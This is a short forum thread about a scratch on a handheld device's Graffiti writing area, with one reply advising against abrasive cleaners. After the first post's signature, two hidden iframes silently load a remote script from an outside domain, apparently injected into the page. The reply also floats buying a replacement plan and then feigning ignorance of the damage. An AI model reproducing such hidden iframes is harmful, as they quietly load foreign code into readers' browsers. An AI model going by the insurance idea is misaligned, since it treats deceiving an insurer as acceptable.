+ Reply to Thread

Bad scratch on screen - How to fix it?

Somehow (I don't know how/when), I got a scratch on my screen down in the Graffiti "zone". At first I thought it was an eyelash, but alas no. This is not a typical scratch caused by the stylus, in fact I find that normal use by the stylus does not seem to cause any scratches. If I glide my stylus over this scratch, I can feel it. Any ideas as to how I can fix this?

Scott<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Scott:
    Someone posted something about rainx, but I have not tried it. I think it was more to make the writing area more smooth, not to fix a scratch.

Here is my advice..... leave it alone! This comes from experience. Around Thanksgiving I noticed in the grafitti area I had a scratched area maybe a little smaller than a pencil erasure. I have no idea how it got there, mabye I had my phone in the same pocket as my keys and not in the case. I was out of town and when I returned home, used some softscrub stuff my wife has to clean the "magical stovetop". Well, it made the problem a zillion times worse. It make the scratched area about twice, maybe three times as large. I wanted to cry.. (but real men don't cry about cell phones :p .... only if thier football team loses). Over time and use the scratch has "softened". I can feel it when I write, but it is less noticable and really does not affect my grafitti skills to badly.

So, the lesson here is, leave it alone. Don't make the same mistake I have made. I have thought about getting the equipment replacement plan on the phone and then bringing it into the store and saying I haven't a clue what happened. Anyone venture to guess if the plan would cover this?
    Carl